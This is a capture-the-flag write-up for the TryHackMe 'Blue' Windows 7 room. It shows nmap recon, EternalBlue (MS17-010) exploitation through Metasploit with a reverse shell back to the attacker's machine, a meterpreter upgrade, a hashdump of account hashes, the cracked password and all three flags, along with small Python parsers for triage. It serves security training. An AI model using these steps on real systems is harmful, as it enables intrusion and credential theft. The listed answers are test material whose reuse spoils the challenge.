
[TryHackMe] Blue-writeup

Posted at 2025-06-26
  • windows
  • easy

Recon

Find the open ports with nmap.

┌─[user@parrot]─[~]
└──╼ $nmap -sCV -T4 10.10.59.52
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-26 02:16 UTC
Nmap scan report for 10.10.59.52
Host is up (0.32s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT      STATE    SERVICE            VERSION
135/tcp   open     msrpc              Microsoft Windows RPC
139/tcp   open     netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds       Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open     ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=Jon-PC
| Not valid before: 2025-06-25T02:12:45
|_Not valid after:  2025-12-25T02:12:45
| rdp-ntlm-info: 
|   Target_Name: JON-PC
|   NetBIOS_Domain_Name: JON-PC
|   NetBIOS_Computer_Name: JON-PC
|   DNS_Domain_Name: Jon-PC
|   DNS_Computer_Name: Jon-PC
|   Product_Version: 6.1.7601
|_  System_Time: 2025-06-26T02:19:40+00:00
|_ssl-date: 2025-06-26T02:19:49+00:00; 0s from scanner time.
5009/tcp  filtered airport-admin
5051/tcp  filtered ida-agent
13722/tcp filtered netbackup
32774/tcp filtered sometimes-rpc11
49152/tcp open     msrpc              Microsoft Windows RPC
49153/tcp open     msrpc              Microsoft Windows RPC
49154/tcp open     msrpc              Microsoft Windows RPC
49158/tcp open     msrpc              Microsoft Windows RPC
49160/tcp open     msrpc              Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-06-26T02:19:39
|_  start_date: 2025-06-26T02:12:43
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Jon-PC
|   NetBIOS computer name: JON-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-06-25T21:19:39-05:00
|_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:76:0b:e8:be:ab (unknown)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
|_clock-skew: mean: 1h00m00s, deviation: 2h14m10s, median: 0s
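As an added example (not part of the original writeup), the following Python parses an nmap normal-output excerpt like the one above and pulls out what a defender would triage from it: the open ports below 1000, whether SMB on 445 is exposed, the OS reported by smb-os-discovery, and whether SMB message signing is disabled. The embedded excerpt is a constructed copy of the scan output above, not a live scan.

```python
import re

# Constructed excerpt of the nmap output shown above (not a live scan).
NMAP_OUTPUT = """\
PORT      STATE    SERVICE            VERSION
135/tcp   open     msrpc              Microsoft Windows RPC
139/tcp   open     netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds       Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open     ssl/ms-wbt-server?
5009/tcp  filtered airport-admin
49152/tcp open     msrpc              Microsoft Windows RPC
Host script results:
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| smb-security-mode: 
|_  message_signing: disabled (dangerous, but default)
"""

# One port-table row: "PORT/PROTO  STATE  SERVICE  [VERSION]".
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_ports(text):
    """Return a list of (port, proto, state, service, version) tuples."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            ports.append((int(port), proto, state, service, version or ""))
    return ports


def open_ports_below(ports, limit):
    """Open ports with a number strictly below `limit`, sorted."""
    return sorted(p for p, _, state, _, _ in ports if state == "open" and p < limit)


def smb_findings(text, ports):
    """Summarise the SMB exposure a defender would act on."""
    findings = {}
    findings["smb_exposed"] = any(p == 445 and s == "open" for p, _, s, _, _ in ports)
    m = re.search(r"^\|\s+OS:\s+(.+)$", text, re.M)
    findings["os"] = m.group(1).strip() if m else None
    m = re.search(r"message_signing:\s+(\w+)", text)
    findings["smb_signing_disabled"] = bool(m) and m.group(1) == "disabled"
    return findings
```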

Run nmap again with the vuln scripts.

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED

The scan found the vulnerability CVE-2017-0143.

How many ports are open with a port number under 1000?

3

What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

ms17-010

Use Metasploit.

┌─[user@parrot]─[~]
└──╼ $msfconsole

Run the search command to find the exploit.

[msf](Jobs:0 Agents:0) >> search ms17-010
Matching Modules
================
   #   Name                                           Disclosure Date  Rank     Check  Description
   -   ----                                           ---------------  ----     -----  -----------
   0   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........)

exploit/windows/smb/ms17_010_eternalblue

Select it with use.

[msf](Jobs:0 Agents:0) >> use 0

Check the options with show options.

[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> show options

Module options (exploit/windows/smb/ms17_010_eternalblue):
   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.

Payload options (windows/x64/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.104.203  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Show options and set the one required value. What is the name of this value? (All caps for submission)

RHOST

Set the target IP with set RHOST.
Set the IP the shell should connect back to (the attacker's IP) with set LHOST.
Set a Windows reverse shell payload.

[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> set RHOST 10.10.59.52
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> set LHOST 10.8.152.254
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> set payload windows/x64/shell/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> run
[+] 10.10.93.63:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.93.63:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.93.63:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

WIN is displayed and we have obtained RCE.

C:\Windows\system32>

Background the shell with Ctrl+Z and search for meterpreter with the search command.

If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)

post/multi/manage/shell_to_meterpreter

Check which option we need to set.

[msf](Jobs:0 Agents:1) post(multi/manage/shell_to_meterpreter) >> use post/multi/manage/shell_to_meterpreter

Select this (use MODULE_PATH). Show options, what option are we required to change?

session

List the sessions to get the ID of the shell obtained earlier.

[msf](Jobs:0 Agents:1) post(multi/manage/shell_to_meterpreter) >> sessions
Active sessions
===============
  Id  Name  Type               Information  Connection
  --  ----  ----               -----------  ----------
  1         shell x64/windows               10.8.152.215:4444 -> 10.10.93.63:49176 (10.10.93.63)

Specify the session with the set command and execute with run.

[msf](Jobs:0 Agents:1) post(multi/manage/shell_to_meterpreter) >> set session 1

Checking the sessions shows that a meterpreter session is now present.

post(multi/manage/shell_to_meterpreter) >> sessions -l

Select session 2.

>> sessions 2

Use the meterpreter hashdump command to obtain the hashes.

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

We obtained the user Jon and the hash of their password.

Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

Jon
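The hashdump lines above are in pwdump format (user:RID:LM-hash:NT-hash:::). As an added example, not from the original writeup, the following Python parses such a dump and reports what a defender reviewing a SAM dump would want: which accounts are non-default (RID 1000 and above), which carry the well-known NT hash of an empty password, and whether any LM hash is still stored. The sample dump is a constructed copy of the three lines above.

```python
# Constructed copy of the hashdump lines shown above (pwdump format:
# user:RID:LM-hash:NT-hash:::).
HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
"""

# Well-known constants: the LM field when no LM hash is stored, and the
# NT hash of the empty string (i.e. a blank password).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Windows assigns RIDs below 1000 to built-in/well-known accounts
# (500 = Administrator, 501 = Guest); user-created accounts start at 1000.
FIRST_USER_RID = 1000


def parse_hashdump(text):
    """Parse pwdump lines into dicts with user, rid, lm and nt fields."""
    accounts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        user, rid, lm, nt = line.split(":")[:4]
        accounts.append({"user": user, "rid": int(rid),
                         "lm": lm.lower(), "nt": nt.lower()})
    return accounts


def non_default_users(accounts):
    """Names of accounts that were created on the machine, not built in."""
    return [a["user"] for a in accounts if a["rid"] >= FIRST_USER_RID]


def audit(accounts):
    """Flag the findings a defender acts on: blank passwords, LM hashes."""
    report = []
    for a in accounts:
        issues = []
        if a["nt"] == EMPTY_NT:
            issues.append("empty password")
        if a["lm"] != EMPTY_LM:
            issues.append("LM hash stored (weak, crackable)")
        report.append({"user": a["user"],
                       "builtin": a["rid"] < FIRST_USER_RID,
                       "issues": issues})
    return report
```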

Crack Jon's password.
I am tired and do not want to use John the Ripper, so I use CrackStation.

Copy this password hash to a file and research how to crack it. What is the cracked password?

alqfna22

Look for the flags with the search command.

> search -f *flag*

> cat C:/flag1.txt
flag{access_the_machine}

> cat C:/Windows/System32/config/flag2.txt
flag{sam_database_elevated_access}

> cat C:/Users/Jon/Documents/flag3.txt
flag{admin_documents_can_be_valuable}

flag1

flag{access_the_machine}

flag2

flag{sam_database_elevated_access}

flag3

flag{admin_documents_can_be_valuable}
